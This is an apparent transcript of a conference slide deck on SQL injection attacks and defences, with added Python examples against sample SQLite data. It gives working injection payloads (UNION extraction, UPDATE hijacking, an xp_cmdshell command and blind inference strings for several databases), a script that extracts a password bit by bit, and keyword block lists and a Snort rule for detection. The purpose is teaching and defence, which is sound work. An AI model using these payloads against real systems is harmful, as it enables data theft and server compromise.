Web application attacks using SQL injection and countermeasures

Post on 18-Nov-2014



An advanced technical presentation on attacking web applications with the SQL injection technique, and the countermeasures against it.

Transcript of Web application attacks using SQL injection and countermeasures

SQL INJECTION ATTACKS

Cade Zvavanjanja, CISO

Gainful Information Security

Introduction  Background  Techniques  Prevention  Demo  Conclusions  Questions

OUTLINE

Background of SQL Injection
Techniques and Examples
Preventing SQL Injection
Demo
Wrap-Up
Questions


BACKGROUND OF SQL INJECTION


DATABASES: WHERE ARE THEY NOW?

Mainframes      Fat Server
Desktop Apps    Fat Client
Web Apps        Fat Server & Fat Client


WHY IS SQL A STANDARD?

Relational Database
Platform Independence
Loose Semantics
Runtime Interpretation


FLEXIBILITY = VULNERABILITY

Simple Injection
Decoding Error Messages
Blind Injection
Encoding Exploits
Stored Procedures
Programmer Error (Faulty Logic)


SQL INJECTION TECHNIQUES


IMPORTANT SYMBOLS

'       "Hack": closes the string literal the application opened around the input
--      "Comment Out": the rest of the statement is ignored
;       "End Statement": terminates the statement so a second one can be stacked after it
% , *   "Wildcards"

SQL INJECTION DEFINITION

The input field is modified in such a way that the database returns unintended data.

SQL: SELECT <column name> FROM <table name> WHERE <logic expression>

EXAMPLE: DATABASE SCHEMA

Table Users
  Has columns "username" and "password"
  Accessed when users log in

Table Customers
  Has column "phone"
  Users can look up other customers' phone numbers by name

Application does no input validation


RETURNING EXTRA ROWS WITH "UNION"

Query:
SELECT phone FROM Customers WHERE last_name = '<name>'

Input:
x' UNION SELECT username FROM users WHERE 'x' = 'x


MODIFYING RECORDS

Application has a password changing page. SQL:
UPDATE users SET password = '<newpassword>' WHERE username = '<username>'

Input:
newpassword' WHERE username LIKE '%admin%' --
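The two payloads above run against a small SQLite database, as an added Python example that is not code from the deck or its author. The table names, the two customers and the two users are constructed sample data; both application functions build their SQL by string concatenation, the pattern the slides describe. SQLite's execute() refuses stacked statements, so the later '; exec ...' style payload cannot be reproduced here, but a UNION and a rewritten WHERE clause are each a single statement and work as shown.

```python
import sqlite3

# Constructed sample data standing in for the deck's Users/Customers schema.
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
CREATE TABLE customers (last_name TEXT, phone TEXT);
INSERT INTO users VALUES ('admin', 'adm1n-pw'), ('bob', 'hunter2');
INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0199');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lookup_phone(db, name):
    # Vulnerable on purpose: the user-supplied name is spliced into the SQL
    # text, as in  SELECT phone FROM Customers WHERE last_name = '<name>'
    sql = "SELECT phone FROM customers WHERE last_name = '" + name + "'"
    return [row[0] for row in db.execute(sql)]


def change_password(db, username, new_password):
    # Vulnerable on purpose: the password-change page's UPDATE, built the same way.
    sql = ("UPDATE users SET password = '" + new_password
           + "' WHERE username = '" + username + "'")
    db.execute(sql)
    db.commit()


def passwords(db):
    return dict(db.execute("SELECT username, password FROM users"))


def union_attack(db):
    # The quote closes the literal, UNION appends a second result set, and
    # the trailing WHERE 'x' = 'x absorbs the closing quote the application adds.
    payload = "x' UNION SELECT username FROM users WHERE 'x' = 'x"
    return lookup_phone(db, payload)


def update_attack(db):
    # Logged in as the low-privilege user 'bob': the quote closes the value,
    # the injected WHERE retargets the UPDATE, and -- comments out the real one.
    payload = "pwned' WHERE username LIKE '%admin%' --"
    change_password(db, "bob", payload)
    return passwords(db)


if __name__ == "__main__":
    db = make_db()
    print(lookup_phone(db, "Smith"))   # the intended behaviour
    print(union_attack(db))           # usernames come back in the phone column
    print(update_attack(db))          # admin's password changed, bob's untouched
```

The UNION payload only works because the injected SELECT returns the same number of columns as the original (one); with more columns the attacker pads with constants.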


MS SQL SERVER

Default SQL Server setup:
Default system admin account "sa" enabled, with no password!!!
Supports multiple queries
"Extended stored procedures": C/C++ DLL files
  Read/write external files
  Access the command line


EXPLOITING SQL SERVER

Use the phone look-up query again:
SELECT phone FROM customers WHERE last_name = '<name>'

Input:
'; exec master..xp_cmdshell 'iisreset'; --


DATA-MINING WITH SQL INJECTION

Three classes of data-mining:
In-band
Out-of-band
Inference

IN-BAND ATTACKS

Data is included in the response from the web server
Could be a well rendered web page
Using UNION SELECTs
Error messages

OUT-OF-BAND ATTACKS

Data is retrieved using another communication channel:
UTL_HTTP.REQUEST
OPENROWSET
XP_SENDMAIL

INFERENCE ATTACKS

At the core of inference is a question
Action taken based upon the answer

Chris Anley's time delay:

declare @s varchar(8000)
select @s = db_name()
if (ascii(substring(@s, 1, 1)) & (power(2, 0))) > 0 waitfor delay '0:0:5'

INFERENCE ATTACKS...CONT:

Examples:
Time delay
Generate 200/500 responses
Response variation

Wildly silly example: send mail to tech support of XYZ Corp about either a modem problem or a monitor problem. If the call comes back about a modem problem, we know the answer.

INFERENCE ATTACKS...CONT: CASE statements in SQL:

SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END

INFERENCE THROUGH WEB SERVER RESPONSE CODES

Need a query that will compile fine but generate an error on branch execution:

SELECT CASE WHEN condition THEN 1 ELSE 1/0 END

INFERENCE THROUGH WEB SERVER RESPONSE CODES...CONT:

Notes:
Works well with SQL Server, Oracle, DB2
MySQL returns NULL for 1/0, so no error is raised
Informix ODBC driver returns 200, even in the event of an error
Response code could be 302 Redirect, etc. The principle is the same.
Leaves a large number of 500 responses in the log files
App environments like PL/SQL will return 404 instead of 500

INFERENCE THROUGH RESPONSE VARIATIONS: Parameter Splitting and Balancing

Avoids 500 responses

PARAMETER SPLITTING AND BALANCING

'NGSSOFTWARE'
'NGSSOFTWA' + 'RE'
'NGSSOFTWA' || 'RE'
'NGSSOFTWA' || (SUBSELECT RETURNS R) || 'E'
'NGSSOFTWA' + (SUBSELECT RETURNS R) + 'E'

2
1 + 1
1 + (SUBSELECT RETURNS 1)

DEALING WITH VARIOUS APPLICATION ENVIRONMENTS

Cold Fusion Management:
Converts " to &quot;
Converts & to &amp;
Converts > to &gt;
Converts < to &lt;
Doubles up single quotes
Usually means the attack vector is numeric input

PHP often doubles single quotes (magic quotes)

DEALING WITH VARIOUS APPLICATION ENVIRONMENTS...CONT:

Rather than > use BETWEEN X AND Y
Rather than & use ^ (xor): A xor BIT = C
  if C is greater than A then the bit is not set
  if C is less than A then the bit is set
Rather than 'A' use CHR(65)/CHAR(65)

INFERENCE QUERIES... SQL Server - String data

' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub-query),the_byte,1)) then char(known_value) else char(1/0) end) + '

INFERENCE QUERIES... Oracle - Numeric

+ (select case when bitand(ascii(substr((sub-query),the_byte,1)),the_bit) between 1 and 255 then 0 else 1/0 end from dual)

INFERENCE QUERIES... Oracle - String data

'|| (select case when bitand(ascii(substr((sub-query),the_byte,1)),the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'

INFERENCE QUERIES... MySQL - Numeric

+ (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end)

(uses page response variation)

INFERENCE QUERIES... MySQL - String data

' + (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + '

(one returns no recordset, the other returns all rows)

INFERENCE QUERIES... Informix - Numeric

+ (select distinct case when bitval((SELECT distinct

DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"\\",92,".",46,"?",63,"-",45,"0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1

INFERENCE QUERIES... Informix - String data

' || (select distinct case when bitval((SELECT distinct

DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"\\",92,".",46,"?",63,"-",45,"0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then '\xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
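The inference technique from the slides above (one yes/no question per bit, answered through parameter splitting and balancing of the string the page compares against), carried through end to end as an added Python example that is not part of the deck. It recovers the admin password from a constructed SQLite sample database through the phone look-up page, observing only whether a row came back. SQLite stands in for the databases on the slides: it has no ascii() (unicode() returns the code point) and, like MySQL, returns NULL for 1/0 instead of raising an error, so the probe uses the response-variation form rather than the 500-response form. The secret value, the table names and the sub-query are assumptions made for the example.

```python
import sqlite3

# Constructed sample data: the phone look-up table plus a secret the
# attacker wants to read back one bit at a time.
SCHEMA = """
CREATE TABLE customers (last_name TEXT, phone TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO customers VALUES ('Smith', '555-0100');
INSERT INTO users VALUES ('admin', 'Zz9!');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def page_returns_rows(db, name):
    # The oracle: the vulnerable phone look-up, observed only as
    # "did the page show a result or not" (response variation, no 500s).
    sql = "SELECT phone FROM customers WHERE last_name = '" + name + "'"
    return len(db.execute(sql).fetchall()) > 0


# Assumed sub-query for the example: the value the attacker wants.
SUBQUERY = "(SELECT password FROM users WHERE username = 'admin')"


def bit_probe(byte, bit):
    # Parameter splitting and balancing: the known literal 'Smith' is rebuilt
    # as 'Smi' || (sub-select returns 'th' or 'xx') || ''. Only when the tested
    # bit is set does the string balance back to 'Smith' and a row come back.
    # substr() past the end of the secret yields '' and unicode('') is NULL,
    # so every bit of a non-existent byte reads as 0.
    case = ("(SELECT CASE WHEN (unicode(substr(%s, %d, 1)) & %d) > 0 "
            "THEN 'th' ELSE 'xx' END)" % (SUBQUERY, byte, bit))
    return "Smi' || " + case + " || '"


def extract_secret(db, max_len=32):
    # Seven questions per byte (printable ASCII fits in 7 bits); a byte that
    # decodes to 0 means we have run past the end of the string.
    out = ""
    for byte in range(1, max_len + 1):
        value = 0
        for bit in (1, 2, 4, 8, 16, 32, 64):
            if page_returns_rows(db, bit_probe(byte, bit)):
                value |= bit
        if value == 0:
            break
        out += chr(value)
    return out


if __name__ == "__main__":
    db = make_db()
    print(bit_probe(1, 1))      # what one probe looks like on the wire
    print(extract_secret(db))   # the admin password, 7 requests per character
```

Each probe is a syntactically valid query whether the answer is yes or no, which is the point of balancing: nothing lands in the web server's error log, only ordinary 200 responses with or without a result row.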


PREVENTING SQL INJECTION

Input Validation
Input Checking Functions
Access Rights
User Permissions
Variable Placeholders
Stored Procedures


INPUT VALIDATION

Checks: Type, Size, Format, Range
Replace quotation marks

"All input is wrong and dangerous"


INPUT CHECKING FUNCTIONS

Built-in character escaping (the deck's PHP example; the escaped version needs the quotes around the value restored, otherwise a payload such as 1 OR 1=1 injects without any quote for the function to escape):

// Vulnerable: user input spliced straight into the query
$sql = "SELECT * FROM Users WHERE ID = '" . $_GET['id'] . "'";

// Escaped: special characters in the value are escaped for the open
// connection, and the value is still enclosed in single quotes
$sql = "SELECT * FROM Users WHERE ID = '" . mysql_real_escape_string($_GET['id']) . "'";
$result = mysql_query($sql);

// Note: the mysql_* functions were removed in PHP 7; use mysqli or PDO
// prepared statements instead.


ACCESS RIGHTS

Web User vs. System Administrator ('sa')


USER PERMISSIONS

Limit query access rights: SELECT, UPDATE, DROP
Restricted statement access: Global-specific, Database-specific, Table-specific


VARIABLE PLACEHOLDERS (?)

Defense from string concatenation
Enforcing database data types

PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?");
prep.setString(1, pwd);
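The placeholder defense and the INPUT VALIDATION checks, side by side with the concatenated look-up they replace, as an added Python/SQLite example that is not from the deck. The sample rows and the surname allow-list pattern are assumptions made for the example; the payloads are the ones from the UNION and MODIFYING RECORDS slides.

```python
import re
import sqlite3

# Constructed sample data (same shape as the deck's Users/Customers tables).
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
CREATE TABLE customers (last_name TEXT, phone TEXT);
INSERT INTO users VALUES ('admin', 'adm1n-pw'), ('bob', 'hunter2');
INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0199');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lookup_phone_vulnerable(db, name):
    # String concatenation: the attack surface from the Techniques slides.
    sql = "SELECT phone FROM customers WHERE last_name = '" + name + "'"
    return [r[0] for r in db.execute(sql)]


def lookup_phone_safe(db, name):
    # Variable placeholder: the driver passes the value separately from the
    # statement text, so quotes, UNION and -- inside it are just characters.
    sql = "SELECT phone FROM customers WHERE last_name = ?"
    return [r[0] for r in db.execute(sql, (name,))]


# Assumed allow-list for a surname: letters, spaces, apostrophes and hyphens,
# 1 to 40 characters. Type/size/format/range checks in one expression.
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z '\-]{0,39}$")


def validated_lookup(db, name):
    # Validation is a second layer in front of the placeholder, not a
    # replacement for it: O'Brien must stay a legal surname, so the
    # apostrophe cannot simply be banned.
    if not NAME_RE.match(name):
        raise ValueError("rejected input")
    return lookup_phone_safe(db, name)


def change_password_safe(db, username, new_password):
    # Parameterised UPDATE: the  newpassword' WHERE username LIKE '%admin%' --
    # payload becomes bob's (odd) new password instead of rewriting the WHERE.
    db.execute("UPDATE users SET password = ? WHERE username = ?",
               (new_password, username))
    db.commit()
    return dict(db.execute("SELECT username, password FROM users"))


if __name__ == "__main__":
    db = make_db()
    payload = "x' UNION SELECT username FROM users WHERE 'x' = 'x"
    print(lookup_phone_vulnerable(db, payload))  # leaks the usernames
    print(lookup_phone_safe(db, payload))        # no surname equals the payload
    print(lookup_phone_safe(db, "O'Brien"))      # no row, but no syntax error either
    print(change_password_safe(db, "bob", "pwned' WHERE username LIKE '%admin%' --"))
```

The placeholder also enforces the column's type at the driver level: a numeric column bound with a string that is not a number simply fails to match, which is the "enforcing database data types" point on the slide.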


STORED PROCEDURES

Use error checking variables
Buffer direct database access


DEMONSTRATION


COUNTERMEASURES

System Administrators:
White List / Blacklist Input Validation
Least Privileges
Application firewalls

Developer:
Stored Procedures
Parameterized queries
Exception handling

WHITELIST INPUT VALIDATION

UrlScan v3.0 restricts the types of HTTP requests that IIS will process:

[SQL Injection Headers]
AppliesTo=.asp,.aspx

[SQL Injection Headers Strings]
--
@   (also catches @@)
;
alter
delete
drop
exec
insert

SNORT: create a rule to check for SQL attack:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection"; flow:to_server,established; uricontent:".php | .aspx | .asp"; pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:web-application-attack; sid:9099; rev:5;)

Note: uricontent takes a single literal string, so ".php | .aspx | .asp" as written never matches; split it into one rule per extension (or a second pcre) for the rule to fire. The pcre then alerts on any quote, -- or # in a URI, legitimate ones included.
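The rule's pcre applied to a handful of constructed request lines (not real traffic), as an added Python example that is not from the deck, to show what a quote-based signature catches and what it misses.

```python
import re

# The pcre from the Snort rule above, as Python's re understands it.
SQLI_SIGNATURE = re.compile(r"(\%27)|(\')|(\-\-)|(%23)|(#)", re.I)

# Constructed request lines, one per line: a normal look-up, the deck's
# UNION payload URL-encoded, a legitimate surname with an apostrophe,
# a numeric-parameter injection that needs no quote, and a path with --.
REQUESTS = """\
GET /lookup.asp?name=Smith HTTP/1.1
GET /lookup.asp?name=x%27%20UNION%20SELECT%20username%20FROM%20users%20WHERE%20%27x%27=%27x HTTP/1.1
GET /lookup.asp?name=O'Brien HTTP/1.1
GET /account.asp?id=7%20OR%201=1 HTTP/1.1
GET /docs/readme--v2.asp HTTP/1.1
"""


def flag_requests(log):
    # Returns (uri, flagged) per request line, applying the signature to the
    # URI only, as pcre in an HTTP rule with uricontent would.
    out = []
    for line in log.splitlines():
        parts = line.split(" ")
        if len(parts) < 2:
            continue
        uri = parts[1]
        out.append((uri, bool(SQLI_SIGNATURE.search(uri))))
    return out


if __name__ == "__main__":
    for uri, flagged in flag_requests(REQUESTS):
        print("ALERT " if flagged else "ok    ", uri)
```

Two of the five alerts are false positives (O'Brien, readme--v2) and the numeric injection at id=7 OR 1=1 passes untouched, which is why the slides pair the signature with least privilege and parameterised queries rather than relying on it alone.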

LEAST PRIVILEGES

Enforce least privileges
CREATE / DELETE
Does not guarantee security
Access to a portion of data: create views

CONCLUSIONS

SQL Injection continues to evolve with new technologies

Dangerous effects:
Access to critical information
Updating data not meant to be updated
Exploiting the DBMS to directly affect the server and its resources

Prevention of SQL Injection:
Input Validation and Query Building
Permissions and Access Rights
Variable Placeholders (Prepare) and Stored Procedures


QUESTIONS

1) What could prevent the 'Students' table from being dropped?
2) What is another way to prevent injection?


REFERENCES

Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php-center.de/en-html-manual/security.database.sql-injection.html>.

Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433.

"Exploits of a Mom." xkcd.com. 4 Mar. 2008 <http://xkcd.com/327/>.

Finnigan, Pete. "SQL Injection and Oracle, Part One." SecurityFocus 21 November 2002. 07 Apr. 2005 <http://www.securityfocus.com/infocus/1644>.

Harper, Mitchell. "SQL Injection Attacks: Are You Safe?" Dev Articles. 29 May 2002. 07 Apr. 2005 <http://www.devarticles.com/c/a/MySQL/SQL-Injection-Attacks-Are-You-Safe/2/>.



Thank You

Tel: +236 733 782 490, +263 773 796 365, +263-4-733 117
Eml: info@gis.co.zw, cade@gis.co.zw
Web: www.gis.co.zw